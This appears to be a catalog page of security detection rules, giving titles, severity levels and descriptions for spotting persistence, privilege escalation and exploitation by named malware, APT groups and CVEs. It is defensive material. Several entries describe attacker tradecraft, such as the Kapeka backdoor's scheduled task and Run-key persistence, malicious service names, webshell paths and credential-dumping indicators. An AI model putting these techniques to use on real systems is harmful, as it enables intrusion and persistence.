Enable Local Manifest Installation With WingetmediumDetects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
Winlogon Notify Key Logon PersistencehighAdversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Winlogon AllowMultipleTSSessions EnablemediumDetects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
WMI Event SubscriptionmediumDetects creation of WMI event subscription persistence method
Suspicious Encoded Scripts in a WMI ConsumerhighDetects suspicious encoded payloads in WMI Event Consumers
CosmicDuke Service InstallationcriticalDetects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
StoneDrill Service InstallhighThis method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
Turla Service InstallhighThis method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
Turla PNG Dropper ServicecriticalThis method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
Oracle WebLogic ExploitcriticalDetects access to a webshell dropped into a keystore folder on the WebLogic server
OilRig APT ActivitycriticalDetects OilRig activity as reported by Nyotron in their March 2018 report
OilRig APT Registry PersistencecriticalDetects OilRig registry persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - SecuritycriticalDetects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - SystemcriticalDetects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
Defrag DeactivationmediumDetects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
Defrag Deactivation - SecuritymediumDetects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
Potential Ryuk Ransomware ActivityhighDetects Ryuk ransomware activity
Suspicious PrinterPorts Creation (CVE-2020-1048)highDetects new commands that add new printer port which point to suspicious file
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - RegistryhighDetects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
FlowCloud Registry MarkerscriticalDetects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
Leviathan Registry Key ActivitycriticalDetects registry key used by Leviathan APT in Malaysian focused campaign
Solarwinds SUPERNOVA Webshell AccesscriticalDetects access to SUPERNOVA webshell as described in Guidepoint report
Suspicious VBScript UN2452 PatternhighDetects suspicious inline VBScript keywords as used by UNC2452
Serv-U Exploitation CVE-2021-35211 by DEV-0322criticalDetects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus ExploitcriticalDetects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
Suspicious Computer Account Name Change CVE-2021-42287highDetects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
Goofy Guineapig Backdoor Service CreationcriticalDetects service creation persistence used by the Goofy Guineapig backdoor
Moriya Rootkit File CreatedcriticalDetects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
Pingback Backdoor File IndicatorshighDetects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
Pingback Backdoor DLL Loading ActivityhighDetects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
Pingback Backdoor ActivityhighDetects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
Small Sieve Malware CommandLine IndicatorhighDetects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
Small Sieve Malware Registry PersistencehighDetects registry value with specific intentional typo and strings seen used by the Small Sieve malware
HAFNIUM Exchange Exploitation ActivitycriticalDetects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
SOURGUM Actor BehaviourshighSuspicious behaviours related to an actor tracked by Microsoft as SOURGUM
DEWMODE Webshell AccesshighDetects access to DEWMODE webshell as described in FIREEYE report
MSSQL Extended Stored Procedure Backdoor MaggiehighThis rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
ChromeLoader Malware ExecutionhighDetects execution of ChromeLoader malware via a registered scheduled task
Serpent Backdoor Payload Execution Via Scheduled TaskhighDetects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
Potential ACTINIUM Persistence ActivityhighDetects specific process parameters as used by ACTINIUM scheduled task persistence creation.
Outlook Task/Note Reminder ReceivedlowDetects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReaderhighDetects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell RequesthighDetects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
Potential CVE-2023-36884 Exploitation Dropped FilemediumDetects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
Potential COLDSTEEL RAT File IndicatorshighDetects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
Potential COLDSTEEL Persistence Service DLL CreationhighDetects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
Potential COLDSTEEL Persistence Service DLL LoadhighDetects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
COLDSTEEL RAT Anonymous User Process ExecutionhighDetects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
COLDSTEEL RAT Cleanup Command ExecutioncriticalDetects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
COLDSTEEL RAT Service Persistence ExecutioncriticalDetects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
Potential COLDSTEEL RAT Windows User CreationhighDetects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
COLDSTEEL Persistence Service CreationhighDetects the creation of new services potentially related to COLDSTEEL RAT
DarkGate - User Created Via Net.EXEhighDetects creation of local users via the net.exe command with the name of "DarkGate"
SNAKE Malware Covert Store Registry KeyhighDetects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA
Potential Encrypted Registry Blob Related To SNAKE MalwaremediumDetects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
SNAKE Malware Service PersistencecriticalDetects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report
Scheduled Tasks Names Used By SVR For GraphicalProton BackdoorhighHunts for known SVR-specific scheduled task names
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task SchedulerhighHunts for known SVR-specific scheduled task names
Diamond Sleet APT Scheduled Task CreationcriticalDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
UNC4841 - Email Exfiltration File PatternhighDetects filename pattern of email related data used by UNC4841 for staging and exfiltration
UNC4841 - Barracuda ESG Exploitation IndicatorshighDetects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
CVE-2024-1708 - ScreenConnect Path Traversal ExploitationmediumThis detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - SecuritycriticalThis detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
ScreenConnect User Database ModificationmediumDetects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
CVE-2024-1709 - ScreenConnect Authentication Bypass ExploitationcriticalDetects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command InjectionhighDetects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
Potential KamiKakaBot Activity - Shutdown Schedule Task CreationmediumDetects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
Potential KamiKakaBot Activity - Winlogon Shell PersistencehighDetects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
Kapeka Backdoor Persistence ActivityhighDetects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
Kapeka Backdoor Autorun PersistencehighDetects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.
Kapeka Backdoor Configuration PersistencemediumDetects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
Kapeka Backdoor Scheduled Task CreationhighDetects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.
Forest Blizzard APT - Custom Protocol Handler CreationhighDetects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT.
Forest Blizzard APT - Custom Protocol Handler DLL Registry SethighDetects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT.
Authentication Occuring Outside Normal Business HourslowDetects user signs ins outside of normal business hours.
Privilege Role Sign-In Outside Of Normal HourshighDetects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated
Potential Remote WMI ActiveScriptEventConsumers ActivitymediumDetect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
Scheduled Task Created - FileCreationlowDetects the creation of a scheduled task via file creation.
Task Scheduler DLL Loaded By Application Located In Potentially Suspicious LocationlowDetects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. Investigation of the loading application and its behavior is required to determining if its malicious.
Remote Access Tool - Ammy Admin Agent ExecutionmediumDetects the execution of the Ammy Admin RMM agent for remote management.
Remote Access Tool - Cmd.EXE Execution via AnyViewermediumDetects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
Execution From Webserver Root FoldermediumDetects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
Scheduled Task Created - RegistrylowDetects the creation of a scheduled task via Registry keys.
Shell Context Menu Command TamperinglowDetects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
Silence.Downloader V3highDetects Silence downloader. These commands are hardcoded into the binary.
Files Dropped to Program Files by Non-Priviledged ProcessmediumSearch for dropping of files to Windows/Program Files fodlers by non-priviledged processes
Malicious Service InstallationscriticalDetects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
Remote Schtasks CreationmediumDetects remote execution via scheduled task creation or update on the destination host
Rare Schtasks CreationslowDetects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
Failed Logins with Different Accounts from Single Source SystemmediumDetects suspicious failed logins with different user accounts from a single source system
Failed NTLM Logins with Different Accounts from Single Source SystemmediumDetects suspicious failed logins with different user accounts from a single source system
Rare Service InstallationslowDetects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
Rare Scheduled Task CreationslowThis rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
attack.privilege_escalation 421
Show Rules (421)
Title Level Description
App Permissions Granted For Other APIsmediumDetects when app permissions (app roles) for other APIs are granted
OMIGOD SCX RunAsProvider ExecuteShellCommand - AuditdhighRule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
User Added To Admin Group - MacOSmediumDetects attempts to create and/or add an account to the admin group, thus granting admin privileges.
Usage Of Malicious POORTRY Signed DriverhighDetects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.
Vulnerable AVAST Anti Rootkit Driver LoadhighDetects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products
Vulnerable Dell BIOS Update Driver LoadhighDetects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
Vulnerable Driver Load By NamelowDetects the load of known vulnerable drivers via their names only.
Vulnerable GIGABYTE Driver LoadhighDetects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation
Vulnerable HW Driver LoadhighDetects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation
Vulnerable Lenovo Driver LoadhighDetects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges
SCM DLL SideloadmediumDetects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
PrintNightmare Powershell ExploitationhighDetects Commandlet name for PrintNightmare exploitation.
Suspicious In-Memory Module ExecutionlowDetects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
Hurricane Panda ActivityhighDetects Hurricane Panda Activity
New Service CreationlowDetects creation of a new service.
Run Whoami as SYSTEMhighDetects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
Kubernetes CronJob/Job ModificationmediumDetects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.
Kubernetes Rolebinding ModificationmediumDetects when a Kubernetes Rolebinding is created or modified.
Kubernetes Unauthorized or Unauthenticated AccesslowDetects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained.
Suspicious SQL QuerymediumDetects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
AWS Attached Malicious Lambda LayermediumDetects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
Malicious Usage Of IMDS Credentials Outside Of AWS InfrastructurehighDetects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
Potential Malicious Usage of CloudTrail System ManagerhighDetect when System Manager successfully executes commands against an instance.
AWS SAML Provider Deletion ActivitymediumDetects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
AWS Key Pair Import ActivitymediumDetects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
New AWS Lambda Function URL Configuration CreatedmediumDetects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
AWS Glue Development Endpoint ActivitylowDetects possible suspicious glue development endpoint activity.
AWS Root CredentialsmediumDetects AWS root account usage
AWS STS AssumeRole MisuselowIdentifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
AWS STS GetSessionToken MisuselowIdentifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
AWS Suspicious SAML ActivitymediumIdentifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
User Added to an Administrator's Azure AD RolemediumUser Added to an Administrator's Azure AD Role
Azure Kubernetes CronJobmediumIdentifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Certificate-Based Authentication EnabledmediumDetects when certificate based authentication has been enabled in an Azure Active Directory tenant.
Changes to Device Registration PolicyhighMonitor and alert for changes to the device registration policy.
New Root Certificate Authority AddedmediumDetects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.
Users Added to Global or Device Admin RoleshighMonitor and alert for users added to device admin roles.
Application AppID Uri Configuration ChangeshighDetects when a configuration change is made to an applications AppID URI.
App Granted Privileged Delegated Or App PermissionshighDetects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
App Assigned To Azure RBAC/Microsoft Entra RolemediumDetects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.
Application URI Configuration ChangeshighDetects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
User State Changed From Guest To MembermediumDetects the change of user type from "Guest" to "Member" for potential elevation of privilege.
PIM Approvals And Deny ElevationhighDetects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.
PIM Alert Setting Changes To DisabledhighDetects when PIM alerts are set to disabled.
Changes To PIM SettingshighDetects when changes are made to PIM roles
User Added To Privilege RolehighDetects when a user is added to a privileged role.
Privileged Account CreationmediumDetects when a new admin is created.
Activity From Anonymous IP AddresshighIdentifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
Atypical TravelhighIdentifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
Impossible TravelhighIdentifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
Suspicious Browser ActivityhighIndicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
Azure AD Threat IntelligencehighIndicates user activity that is unusual for the user or consistent with known attack patterns.
New CountryhighDetects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
Unfamiliar Sign-In PropertieshighDetects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
Stale Accounts In A Privileged RolehighIdentifies when an account hasn't signed in during the past n number of days.
Invalid PIM LicensehighIdentifies when an organization doesn't have the proper license for PIM and is out of compliance.
Roles Assigned Outside PIMhighIdentifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.
Roles Activation Doesn't Require MFAhighIdentifies when a privilege role can be activated without performing mfa.
Roles Activated Too FrequentlyhighIdentifies when the same privilege role has multiple activations by the same user.
Roles Are Not Being UsedhighIdentifies when a user has been assigned a privilege role and are not using that role.
Too Many Global AdminshighIdentifies an event where there are there are too many accounts assigned the Global Administrator role.
Application Using Device Code Authentication FlowmediumDevice code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
Applications That Are Using ROPC Authentication FlowmediumResource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
Bitbucket Global Permission ChangedmediumDetects global permissions change activity.
GCP Access Policy DeletedmediumDetects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.
Google Cloud Kubernetes CronJobmediumIdentifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Google Workspace Application Access Level ModifiedmediumDetects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources.
Github New Secret CreatedlowDetects when a user creates action secret for the organization, environment, codespaces or repository.
Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
Github SSH Certificate Configuration ChangedmediumDetects when changes are made to the SSH certificate configuration of the organization.
Linux Capabilities DiscoverylowDetects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.
Possible Coin Miner CPU Priority ParamcriticalDetects command line parameter very often used with coin miners
Loading of Kernel Module via InsmodhighDetects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
Buffer Overflow AttemptshighDetects buffer overflow attempts in Unix system log files
Code Injection by ld.so PreloadhighDetects the ld.so preload persistence file. See `man ld.so` for more information.
Nimbuspwn ExploitationhighDetects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)
PwnKit Local Privilege EscalationhighDetects potential PwnKit exploitation CVE-2021-4034 in auth logs
Sudo Privilege Escalation CVE-2019-14287 - BuiltincriticalDetects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Linux Doas Conf File CreationmediumDetects the creation of doas.conf file in linux host platform.
Linux Doas Tool ExecutionlowDetects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
OMIGOD SCX RunAsProvider ExecuteShellCommandhighRule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Scheduled Cron Task/Job - LinuxmediumDetects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Sudo Privilege Escalation CVE-2019-14287highDetects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Triple Cross eBPF Rootkit Execve HijackhighDetects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
User Added To Root/Sudoers Group Using UsermodmediumDetects usage of the "usermod" binary to add users add users to the root or suoders groups
MacOS Emond Launch DaemonmediumDetects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
Startup Item File Created - MacOSlowDetects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
User Added To Admin Group Via DsclmediumDetects attempts to create and add an account to the admin group via "dscl"
User Added To Admin Group Via DseditGroupmediumDetects attempts to create and/or add an account to the admin group, thus granting admin privileges.
Scheduled Cron Task/Job - MacOsmediumDetects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
User Added To Admin Group Via SysadminctlmediumDetects attempts to create and add an account to the admin group via "sysadminctl"
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
OMIGOD HTTP No Authentication RCEhighDetects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Audit CVE EventcriticalDetects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
CodeIntegrity - Disallowed File For Protected Processes Has Been BlockedhighDetects block events for files that are disallowed by code integrity for protected processes
CodeIntegrity - Blocked Image/Driver Load For Policy ViolationhighDetects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.
CodeIntegrity - Blocked Driver Load With Revoked CertificatehighDetects blocked load attempts of revoked drivers
CodeIntegrity - Revoked Kernel Driver LoadedhighDetects the load of a revoked kernel driver
CodeIntegrity - Blocked Image Load With Revoked CertificatehighDetects blocked image load events with revoked certificates by code integrity.
CodeIntegrity - Revoked Image LoadedhighDetects image load events with revoked certificates by code integrity.
CodeIntegrity - Unsigned Kernel Module LoadedhighDetects the presence of a loaded unsigned kernel module on the system.
CodeIntegrity - Unsigned Image LoadedhighDetects loaded unsigned image on the system
CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel ModulehighDetects loaded kernel modules that did not meet the WHQL signing requirements.
Standard User In High Privileged GroupmediumDetect standard users login that are part of high privileged groups such as the Administrator group
ADCS Certificate Template Configuration VulnerabilitylowDetects certificate creation with template allowing risk permission subject
ADCS Certificate Template Configuration Vulnerability with Risky EKUhighDetects certificate creation with template allowing risk permission subject and risky EKU
CobaltStrike Service Installations - SecurityhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
HackTool - NoFilter ExecutionhighDetects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators
Meterpreter or Cobalt Strike Getsystem Service Installation - SecurityhighDetects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
Register new Logon Process by RubeushighDetects potential use of Rubeus via registered new trusted logon process
Service Registry Key Read Access RequestlowDetects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
SCM Database Privileged OperationmediumDetects non-system users performing privileged operation os the SCM database
Service Installed By Unusual Client - SecurityhighDetects a service installed by a client which has PID 0 or whose parent has PID 0
Win Susp Computer Name Containing SamtheadmincriticalDetects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
Addition of SID History to Active Directory ObjectmediumAn attacker can use the SID history attribute to gain additional privileges.
Account Tampering - Suspicious Failed Logon ReasonsmediumThis method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Group Policy Abuse for Privilege AdditionmediumDetects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.
Startup/Logon Script Added to Group Policy ObjectmediumDetects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.
Suspicious Scheduled Task CreationhighDetects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
Important Scheduled Task Deleted/DisabledhighDetects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
Suspicious Scheduled Task UpdatehighDetects update to a scheduled task event that contain suspicious keywords.
User Added to Local Administrator GroupmediumDetects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity
